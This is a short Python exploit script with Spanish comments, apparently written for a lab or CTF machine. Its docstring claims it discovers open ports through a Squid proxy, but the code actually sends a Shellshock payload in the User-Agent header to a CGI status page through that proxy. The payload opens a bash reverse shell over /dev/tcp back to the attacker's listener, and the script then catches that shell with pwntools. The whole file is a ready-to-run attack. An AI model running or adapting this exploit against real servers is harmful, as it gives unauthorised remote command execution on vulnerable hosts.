# /var/bin/env python3
"""
Script para descubrir puertos abiertos en un servidor web 
a través de un proxy Squid.
"""


import requests
import signal
import sys
import threading

from pwn import *
from termcolor import colored


def signal_handler(sig, frame):
    print(colored('\n\n[!] Saliendo con Ctrl+C!\n', 'red'))
    sys.exit(0)


# Ctrl+C handler
signal.signal(signal.SIGINT, signal_handler)

MAIN_URL = "http://127.0.0.1/cgi-bin/status"
squid_proxy = {'http': 'http://192.168.1.150:3128'}
lport = 443


def shellshock_attack():

    headers = {
        "User-Agent": "() { :; }; /bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.1.150/443 0>&1'"
    }

    r = requests.get(
        MAIN_URL, headers=headers,
        proxies=squid_proxy, timeout=1
    )


if __name__ == "__main__":

    try:

        threading.Thread(target=shellshock_attack(), args=()).start()

    except Exception as e:

        log.error(str(e))

    shell = listen(lport, timeout=20).wait_for_connection()

    if shell.sock is None:

        log.failure(colored(
            "\n[!] No se ha podido establecer la conexión\n", "red"
        ))

        sys.exit(1)

    else:

        log.success(colored("\n[+] Conexión establecida\n", "green"))
        shell.interactive()